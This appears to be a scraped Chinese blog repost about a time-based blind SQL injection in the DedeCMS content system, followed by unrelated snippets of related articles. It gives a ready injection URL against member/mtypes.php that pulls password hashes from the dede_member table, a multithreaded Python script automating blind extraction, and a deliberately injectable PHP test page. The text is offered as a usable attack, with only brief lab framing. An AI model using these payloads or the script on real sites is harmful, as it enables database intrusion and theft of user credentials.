最新织梦的一个延时注入

localhost/data/admin/ver.txt
查看补丁

member/mtypes.php?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name][a‘ and `‘`.``.mtypeid or if(ascii (substr((select pwd from dede_member limit 1),1,1))%3d50,1,0) and mtypeid%3d1%23]=名字&_FILES[mtypename][size]=.xxxx

织梦的默认可以K掉注入。。所以必须要手工试着枚举可能 所有英文字母、、
对照下ascll码表~

如果有跟我一样懒得话 参照lcy影牛写的一个py脚本 php跑延迟注入

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2015-08-29 22:26:17
# @Last Modified by:   Lcy
# @Last Modified time: 2015-08-30 01:37:01
# blog:https://phpinfo.me
# 延迟注入工具
import urllib2
import time
import socket
import threading
import requests

class my_threading(threading.Thread):
                def __init__(self, str,x):
                                threading.Thread.__init__(self)
                                self.str = str
                                self.x = x
                def run(self):
                        global res
                        x=self.x
                        j = self.str
                        url = "http://localhost/demo/1.php?username=root‘+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
                        html = request(url)
                        verify = ‘timeout‘
                        if verify not in html:
                                res[str(j)] = 0
                                #print 1
                        else:
                                res[str(j)] = 1

def request(URL):
        user_agent = { ‘User-Agent‘ : ‘Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10‘ }
        req = urllib2.Request(URL, None, user_agent)
        try:
                request = urllib2.urlopen(req,timeout=2)
        except Exception ,e:
                time.sleep(2)
                return ‘timeout‘
        return request.read()         

def curl(url):
        try:
                        start = time.clock()
                        requests.get(url)
                        end = time.clock()
                        return int(end)
        except requests.RequestException as e:
                        print u"访问出错!"
                        exit()
def getLength():
        i = 0
        while True:
                print "[+] Checking: %s \r" %i
                url = "http://localhost/demo/1.php?username=root‘+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"
                timeout = curl(url)
                if timeout >= 1:
                        print u"[+] 数据长度为: %s" %i
                        return i
                i = i + 1
def bin2dec(string_num):
        return int(string_num, 2)

def getData(dataLength):
        global res
        data = ""
        for x in range(dataLength):
                x = x + 1
                #print x
                threads = []
                for j in range(8):
                        result = ""
                        j = j + 1
                        sb = my_threading(j,x)
                        sb.setDaemon(True)
                        threads.append(sb)
                        #print j
                for t in threads:
                                t.start()
                for t in threads:
                                t.join()
                #print res
                tmp = ""
                for i in range(8):
                        tmp = tmp + str(res[str(i+1)])
                #print chr(bin2dec(tmp))
                res = {}
                result = chr(bin2dec(tmp))
                print result
                data = data + result
                sb = None
        print "[+] ok!"
        print "[+] result:" + data

if __name__ == ‘__main__‘:
        stop = False
        res = {}
        length = getLength()
            getData(length)
<?php
/*
* @Author: Lcy
* @Date:   2015-08-29 22:09:59
* @Last Modified by:   Lcy
* @Last Modified time: 2015-08-30 00:34:31
* 延迟注入测试
*/
header("Content-type:text/html;charset=utf8");
$link = mysql_connect("localhost", "root","");
mysql_select_db("mysql", $link);
mysql_set_charset("utf8");
$sql = "SELECT user FROM user where user=‘{$_GET[‘username‘]}‘";
echo $sql;
$query = mysql_query($sql);
echo "这是一个没有任何回显的注入点";

?>转自:http://www.silic.top/index.php/archives/7/
时间: 2024-12-17 03:19:38

最新织梦的一个延时注入的相关文章

最新织梦dedecms模板调用标签大全(适用dedecms5.7)

织梦DEDE模板调用标签大全-提高制作模板速度--------------------------------------------------------------------------------关键描述调用标签: <meta name="keywords" content="{dede:field name='keywords'/}"><meta name="description" content="{d

六、nginx搭建织梦DedeCms网站

1.介绍: 织梦内容管理系统(DedeCms) 以简单.实用.开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用本系统. 优点: 1.易用:使用织梦你可以用十分钟学习它,十分钟搭建一个. 2.完善:织梦基本包含了一个常规网站需要的一切功能. 3.丰富的资料

织梦dedecms建网站技巧:4个细节问题和技巧

相信很多站长朋友都会认识织梦dedecms这个网站程序,并且这一款程序受到很多人的喜爱,原因是他能够生成静态页面,这样是非常便于网站的SEO优化,另外织梦程序使用简单使用,成为大部分企业网站和资讯网站的站长的首选.但在使用织梦的过程中也会遇到一些问题和麻烦,今天彭健跟大家分享一下一些细节的问题和使用技巧. 一.织梦简略标题的应用 大家都知道,搜索引擎对于图片的识别的技术是非常不成熟的,所以我们在图片上加入ALT说明标签便于搜索引擎了解图片,但对于使用织梦程序建站的时候,首页.栏目页面的一些图片缩

九、搭建织梦cms网站

九.搭建织梦cms网站 1.介绍: 织梦内容管理系统(DedeCms) 以简单.实用.开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用本系统. 优点: 1.易用:使用织梦你可以用十分钟学习它,十分钟搭建一个. 2.完善:织梦基本包含了一个常规网站需要的一

“织梦”CMS注入高危漏洞情况

"织梦"CMS注入高危漏洞情况 作者:    时间:2014-04-17   "织梦"CMS是由上海卓卓网络科技有限公司研发的一款网站建站系统软件,又称"DEDE内容管理系统",在国内应用较为广泛.2014年2月25日,该软件被披露存在一个高危漏洞,由于页面参数未进行严格过滤,存在SQL注入漏洞.受漏洞影响的织梦CMS 版本包括V 5.7 SP1及以下版本.至2月28日,针对该漏洞的攻击利用代码和相关利用工具在互联网上已经被公开传播.攻击者可利用

怎样查看一个网站是否使用dedecms织梦程序的版本

我们知道一个网站是使用的织梦DedeCMS的程序之后(怎么判断网站是否使用织梦程序,可以看这篇文章:怎样查看一个网站是否使用dedecms织梦程序做的),如果还想知道这个网站使用的是织梦的哪个版本,是否打了最新的补丁等等信息,我们就需要进一步的找默认程序相关的信息.首先我们需要了解一下,织梦的版本判断是在哪个文件里面的.如果能够访问这个文件,那就可以判断出目标网站所使用的织梦DedeCms是哪个版本的,打了哪一天的补丁了.具体来说,织梦的版本号信息是在/data/admin/ver.txt中.我

【邪客论坛】织梦注入工具 更新版

比原来的效率好了 现在版本添加了 软件在线更新 原版本注入:http://www.xksafe.com/forum.php?mod=viewthread&tid=48930&fromuid=1967有人问 更新了什么? 你去拿一个织梦(dedecms)的站 来比较原工具和更新后的 漏洞利用成功 利用失败比较看看 现更新版本 漏洞利用成功 利用失败 截图<ignore_js_op><ignore_js_op> 原版本 漏洞利用成功 利用失败 截图原版本就是 不管漏洞利

怎样查看一个网站是否使用dedecms织梦程序做的

对于一个自己看上的好网站,我们总是迫不及待的想知道它是用什么程序做的.然后自己也可以通过仿站.采集等做一个类似的站点.今天分享点如何判断一个网站是否是使用的织梦DedeCMS程序制作的知识,以后看上哪个站点,直接仿下来就是了.还有一个问题,如果我知道这个网站是织梦DedeCMS制作的,如何判断使用的是织梦DedeCMS的哪个版本呢?织梦DedeCMS网站及其版本的判断一文就来说下这两个问题,不过这些判断只能作为一个参考,不能绝对的肯定哦.首先:我们打开一个网站,想知道它是用什么程序做的,第一点需

织梦模板调用最新文章标签、推荐内容标签、热门文章标签、栏目标签

织梦模板调用最新文章标签.推荐内容标签.热门文章标签.栏目标签 <div> <!--最新文档-->    {dede:arclist row=10 titlelen=42}    <li><a href="[field:arcurl/]">[field:title/]</a></li>    {/dede:arclist}    <!--//最新文档--></div> 推荐内容标签调用:&l